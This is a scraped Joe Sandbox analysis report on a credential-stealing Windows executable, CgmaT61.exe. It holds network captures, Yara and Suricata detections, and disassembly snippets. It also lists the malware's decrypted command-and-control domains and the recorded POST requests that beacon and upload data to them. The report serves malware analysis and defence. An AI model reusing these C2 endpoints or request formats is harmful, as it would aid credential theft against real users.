0f 9e 61 20 a9 a8 18 d4 eb c0 6f a7 43 7b 98 f1 48 87 8b 49 9f 8e 1a 9e 99 af 18 f3 15 a9 da 7d c6 dd 2c f2 94 34 11 f8 92 60 1f 47 f7 20 58 cb a1 1e 91 3e 91 ef Data Ascii: 9(x(3\|/NEQ~H[>rdx*!42!D!8#bI;EM\a<jFuq.y;5&Dy4Rrwa3@7o3-+Cr-FLE}^]dJz,s#h{a oC{HI},4`G X>
2025-03-07 18:46:07 UTC	15331	OUT	Data Raw: 5c 03 12 14 a7 d5 9e d9 1a a0 97 b6 92 27 c0 f2 c8 4e 48 10 93 31 7b b6 f7 27 fe ee 2c ec e9 62 94 ef 0f 03 d1 d1 4d 76 2a ca c6 53 1a 9b c0 4c df 3f 53 0b e1 be b7 15 c2 6a 53 fd e8 15 a4 13 9c ca f9 90 3b ff bb 65 bd 96 0b 10 57 8c b5 9a 37 1a 7a cd 94 e9 a2 6e d7 ec ab 2a b8 9d 71 31 a0 52 c1 66 3f 34 c4 54 c7 74 47 f8 ca c1 05 3d 22 1f 0b 23 f2 41 8e b3 a5 4c f0 71 e5 a7 79 e3 f5 8e 19 fb 44 cc 6e 77 25 8e d0 0a b9 85 72 59 7e 6f dc a1 9d 4f 35 aa c9 2f c7 47 b1 10 c9 f0 f9 0e 96 03 28 5c 6b c2 6f 68 ac 6d 0f 08 28 ba ca 39 19 ab 43 95 ec 81 40 4e 03 ec eb f7 79 b1 44 22 80 88 bb 79 1b 9f e6 56 79 cd b5 80 8a f3 be 96 e5 e4 9f 62 f7 17 c4 45 0a 2a f0 60 49 21 2d 8f 19 20 8d 83 8f 2d b7 7e c7 40 75 fc c2 b4 3b 1e 42 25 86 f5 8d fb 30 7b 20 11 c7 85 20 Data Ascii: \'NH1{',bMvSL?SjS;eW7znq1Rf?4TtG="#ALqyDnw%rY~oO5/G(\kohm(9C@NyD"yVybE*`I!- -~@u;B%0{
2025-03-07 18:46:07 UTC	15331	OUT	Data Raw: f7 50 bc 83 84 5b b8 6f 1a 26 e5 1b 70 76 8a 78 f3 8c 83 6f db fb a1 68 23 21 39 7a 9a 90 b0 dc 65 50 98 00 93 ed 83 9a de e5 90 ed 56 ad 09 70 82 1c 1e 53 92 16 f2 ac ce d2 ba e2 70 df d0 05 a7 3d 4d 73 47 44 33 c6 7c e3 09 08 ca 4b 2b b6 4b 79 b3 9d b7 b8 d3 13 24 e4 a7 e3 56 7d 19 9e 05 c5 4d 58 99 f5 56 9c c1 fa f9 25 19 b3 cf 2d 68 36 a6 9b 61 51 fd 4d 35 9c 3b 09 61 25 25 9d 06 7f 07 c1 07 e9 8b f3 a4 30 31 84 bb d5 0a ec cd 8b a0 8e 85 c8 40 49 cb 54 0d 37 32 67 fd 3b 14 a6 e8 1e db 32 3b 91 8e e0 ad 9b 57 d5 a2 02 7d a4 7d c2 64 1b a5 f6 5d 33 6d ac a3 58 e8 d6 fb 57 ca 03 63 ed 8e 58 a8 63 b4 ae 8d da ae e2 3b af 61 ee 0b e6 f1 71 fd 93 b4 1d 19 a4 ad 21 f8 d1 56 10 ca c8 ce b1 72 40 1d 01 86 30 56 db 6e ae 21 16 1e 1f 2c 95 a0 d5 ef 49 c0 51 59 Data Ascii: P[o&pvxoh#!9zePVpSp=MsGD3\|K+Ky$V}MXV%-h6aQM5;a%%01@IT72g;2;W}}d]3mXWcXc;aq!Vr@0Vn!,IQY
2025-03-07 18:46:07 UTC	15331	OUT	Data Raw: 35 11 5d 62 0e 47 d3 bc d7 39 33 08 49 b7 d0 0d 67 6e 8c f8 71 8b 47 3a 74 98 3c d2 ab cf d0 40 64 ca ac 9e 71 b5 a2 97 c6 0d d8 c2 bc 18 e7 5e a3 57 44 34 c2 e3 13 86 69 bf 3a de 5b 74 32 6d 1a 1d 9b 8d 82 25 36 45 6b 3f 48 8b d8 75 37 42 04 f2 b9 7f 4f 2b 1e e4 cc a8 8a 52 5d 51 6e 41 8a 74 5a ad e7 28 16 d7 7b 4e f6 45 81 cc ce 73 04 56 b0 e8 1a d4 e3 47 8f de 0f 83 d5 f8 69 20 fc da e4 73 44 c7 a1 ca 20 66 5b e3 2b 41 a5 0e ee c3 b6 16 b3 e6 87 0c ce bb ab a3 34 bf 59 a2 f1 cb 75 61 e1 fe 9d d7 a3 2c 7d de 62 a2 57 2e f2 ff 39 77 77 d6 5f 00 67 a7 dd 86 be cb 18 06 9e 17 da a7 fd 53 5a 41 03 69 7e fb f2 f1 9f 2f d3 6d bd a8 68 40 14 2e 4c b9 80 56 0b 3f 52 f2 c1 8e 4e 25 17 0e a9 28 d6 34 8f 16 d5 c8 4d 00 08 07 99 2d 4c 82 46 f8 2c 90 8a a8 59 d4 0e Data Ascii: 5]bG93IgnqG:t<@dq^WD4i:[t2m%6Ek?Hu7BO+R]QnAtZ({NEsVGi sD f[+A4Yua,}bW.9ww_gSZAi~/mh@.LV?RN%(4M-LF,Y
2025-03-07 18:46:07 UTC	15331	OUT	Data Raw: ac 95 95 41 cb 89 8b e9 07 e3 61 11 7c 68 d2 ed f1 42 54 be ec 83 0e b6 ae 1e 70 d6 f1 83 b8 50 e6 ca 46 aa 79 1b 0f 66 c8 0d c8 43 06 a8 f7 09 cc 09 99 6a f3 cb 5d 8a 74 30 9a 26 16 c2 cf c1 43 2a 68 3e 4c 01 b1 d2 54 2e 03 61 d6 39 a8 04 a5 5f e7 3e d0 38 a0 e6 d8 d9 cd 23 82 36 c6 70 36 79 81 d0 47 da d5 39 e6 18 e9 74 d3 16 aa 2b 68 f2 ad 62 11 6e 81 8e 1e 56 3c c1 d1 be a5 2c d8 67 99 43 3e 02 b0 31 98 86 f3 f3 e8 f1 15 86 ba 75 0e 4c b1 ee 7a eb 5d 07 20 88 93 7f dd 8c e5 60 f8 eb c3 4d 45 b7 46 fc 43 0a 1b 0d b8 53 78 8c 03 21 e3 23 e5 01 c9 56 67 72 1d 1a aa e6 c7 1c b3 56 5b c0 d3 00 0d 47 7b 9b 0f c8 e1 33 b0 12 1d 1b 01 9a a6 4d e5 20 18 b1 e3 85 c8 36 81 91 26 6a c8 f2 96 14 6f 64 5f a3 c4 db 95 39 d7 95 67 a9 bd 9d f5 19 66 8e 42 f6 b2 0c e0 Data Ascii: Aa\|hBTpPFyfCj]t0&C*h>LT.a9_>8#6p6yG9t+hbnV<,gC>1uLz] `MEFCSx!#VgrV[G{3M 6&jod_9gfB
2025-03-07 18:46:09 UTC	272	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:46:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Server: cloudflare Vary: Accept-Encoding Cf-Cache-Status: DYNAMIC CF-RAY: 91cc40fcba0722c7-ORD alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49689	188.114.97.3	443	6932	C:\Users\user\Desktop\CgmaT61.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:46:12 UTC	269	OUT	POST /QwdZdf HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 97 Host: begindecafer.world
2025-03-07 18:46:12 UTC	97	OUT	Data Raw: 75 69 64 3d 37 62 32 39 35 35 36 36 35 39 37 66 32 35 61 37 32 61 32 34 34 35 33 30 39 34 61 37 62 35 31 61 31 37 35 36 65 30 65 66 32 30 38 63 66 61 37 38 39 33 26 63 69 64 3d 26 68 77 69 64 3d 39 33 35 30 41 35 45 35 39 38 42 43 36 43 34 38 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33 34 Data Ascii: uid=7b295566597f25a72a24453094a7b51a1756e0ef208cfa7893&cid=&hwid=9350A5E598BC6C48E3EDCEA778368E34
2025-03-07 18:46:13 UTC	789	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:46:13 GMT Content-Type: application/octet-stream Content-Length: 43 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aDm8kX7Tpe3pB31%2Fkx5%2FzCYG5jZRbNay5871OtwkGTG2VS5OG2PTzqB%2Fp5xi82k6y6bihKJAe52vTVWeKLYg47ogEzeuvKEg9iP%2FLK9ACe90Z9T9roGRf37TpMjzg%2FVL5KQ21aI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cc411cbd8b61af-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=32404&min_rtt=30689&rtt_var=10454&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1002&delivery_rate=78854&cwnd=59&unsent_bytes=0&cid=7f1cf1b914b2c165&ts=825&x=0"
2025-03-07 18:46:13 UTC	43	IN	Data Raw: 7e 27 7b ce 84 ed 1e 6d 68 ac 57 24 dd 40 60 25 26 85 09 42 45 a7 ce 6f 03 74 f4 88 20 2b f5 66 56 9a 89 3e c6 cc 29 17 f8 5a 8c Data Ascii: ~'{mhW$@`%&BEot +fV>)Z

Target ID:	0
Start time:	13:45:48
Start date:	07/03/2025
Path:	C:\Users\user\Desktop\CgmaT61.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CgmaT61.exe"
Imagebase:	0xa40000
File size:	2'067'968 bytes
MD5 hash:	A62FE491673F0DE54E959DEFBFEBD0DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1050910887.0000000001696000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1051038294.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Source: https://begindecafer.world/QwdZdfp	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/V?	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/JnsHYY	Avira URL Cloud: Label: malware
Source: https://begindecafer.world/QwdZdf	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/JnsHYg	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/JnsHY	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/JnsHYmeP	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/6?	Avira URL Cloud: Label: malware
Source: https://begindecafer.world/QwdZdfh	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/JnsHYf	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/n?	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/JnsHY(	Avira URL Cloud: Label: malware
Source: https://begindecafer.world/	Avira URL Cloud: Label: malware
Source: https://begindecafer.world:443/QwdZdf	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/JnsHY82c	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/JnsHYh	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/JnsHYID	Avira URL Cloud: Label: malware
Source: https://begindecafer.world/V	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/JnsHY?z	Avira URL Cloud: Label: malware

Source: 0.2.CgmaT61.exe.a40000.0.unpack	String decryptor: arisechairedd.shop/JnsHY
Source: 0.2.CgmaT61.exe.a40000.0.unpack	String decryptor: begindecafer.world/QwdZdf
Source: 0.2.CgmaT61.exe.a40000.0.unpack	String decryptor: garagedrootz.top/oPsoJAN
Source: 0.2.CgmaT61.exe.a40000.0.unpack	String decryptor: modelshiverd.icu/bJhnsj
Source: 0.2.CgmaT61.exe.a40000.0.unpack	String decryptor: catterjur.run/boSnzhu
Source: 0.2.CgmaT61.exe.a40000.0.unpack	String decryptor: orangemyther.live/IozZ
Source: 0.2.CgmaT61.exe.a40000.0.unpack	String decryptor: fostinjec.today/LksNAz

Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49683 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49689 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49682 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49688 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49685 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49684 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49687 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49686 -> 104.21.16.1:443

Source: CgmaT61.exe	Virustotal: Detection: 66%			Perma Link
Source: CgmaT61.exe	ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A5B1D8 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A5B1D8 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A5B55A CryptUnprotectData,	0_2_00A5B55A

Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	0_2_00A700B0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	0_2_00A8C1D0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-25088CECh]	0_2_00A52124
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov ebp, edx	0_2_00A8C320
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp word ptr [ebp+eax+00h], 0000h	0_2_00A5A430
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000B2h]	0_2_00A50994
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00A6CBB0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+10h]	0_2_00A60B40
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+10h]	0_2_00A60B40
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+esi-000000FEh]	0_2_00A8D0C0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h]	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_00A773CB
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then lea eax, dword ptr [ecx-6C0B83CEh]	0_2_00A4D780
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00A51822
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F7D6D3F6h	0_2_00A8D960
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+14h]	0_2_00A4DA3A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+317AB538h]	0_2_00A4DA3A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-443B8DA2h]	0_2_00A5E0AC
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00A5E0AC
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-38B2FA5Ch]	0_2_00A72120
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00A72120
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+12h]	0_2_00A4C130
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00A4E174
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000084h]	0_2_00A5E2C6
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 720EEED4h	0_2_00A88240
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+08h]	0_2_00A88240
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6C0B83D6h]	0_2_00A88240
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00A4A390
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00A4A390
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00A7836E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_00A5A370
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+03h]	0_2_00A64430
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00A7845D
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00A72540
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-52h]	0_2_00A70670
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+2Ch]	0_2_00A70650
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]	0_2_00A62792
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 8D94E5DFh	0_2_00A84750
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax]	0_2_00A84750
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movsx edx, byte ptr [ebx+ecx]	0_2_00A8A88E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00A80880
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	0_2_00A8C8C0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov dword ptr [esp], ebx	0_2_00A769C1
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov ebp, eax	0_2_00A48B20
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov eax, ecx	0_2_00A5EB66
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp word ptr [eax+edx+02h], 0000h	0_2_00A84B60
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h]	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	0_2_00A5B1D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	0_2_00A5EEFE
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000084h]	0_2_00A5EEFE
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+62h]	0_2_00A52F82
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	0_2_00A890EF
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00A692A0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2B12B9D2h]	0_2_00A6F3C0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00A6D32F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00A5D315
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+02h]	0_2_00A51368
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_00A774D1
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_00A5B55A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h]	0_2_00A5B55A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00A5B55A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	0_2_00A5B55A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00A8B680
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00A8B790
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then jmp eax	0_2_00A4F769
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00A8B9B0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-443B8DA2h]	0_2_00A5D99F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00A5D99F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00A8B900
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00A69910
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-79B0712Ah]	0_2_00A6DAA2
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edx, word ptr [eax]	0_2_00A6DAA2
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	0_2_00A6DAA2
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov edx, edi	0_2_00A63A80
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00A8BA40
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+12EB444Ah]	0_2_00A4FB20
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+5Dh]	0_2_00A4DC9E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00A73EE0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68h]	0_2_00A5FF37
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ebp+02h]	0_2_00A69F30
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+03h]	0_2_00A65F40

Source: global traffic	HTTP traffic detected: POST /JnsHY HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 59Host: arisechairedd.shop
Source: global traffic	HTTP traffic detected: POST /JnsHY HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=lSD7soyrfLDKDwHnQdUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14529Host: arisechairedd.shop
Source: global traffic	HTTP traffic detected: POST /JnsHY HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AMb0gs2fYr9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15040Host: arisechairedd.shop
Source: global traffic	HTTP traffic detected: POST /JnsHY HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V0ywOmfHYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20199Host: arisechairedd.shop
Source: global traffic	HTTP traffic detected: POST /JnsHY HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=hXJw4nxBiPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2603Host: arisechairedd.shop
Source: global traffic	HTTP traffic detected: POST /JnsHY HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=89IhYm17User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570780Host: arisechairedd.shop
Source: global traffic	HTTP traffic detected: POST /QwdZdf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 97Host: begindecafer.world

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: arisechairedd.shop
Source: global traffic	DNS traffic detected: DNS query: begindecafer.world

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CgmaT61.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

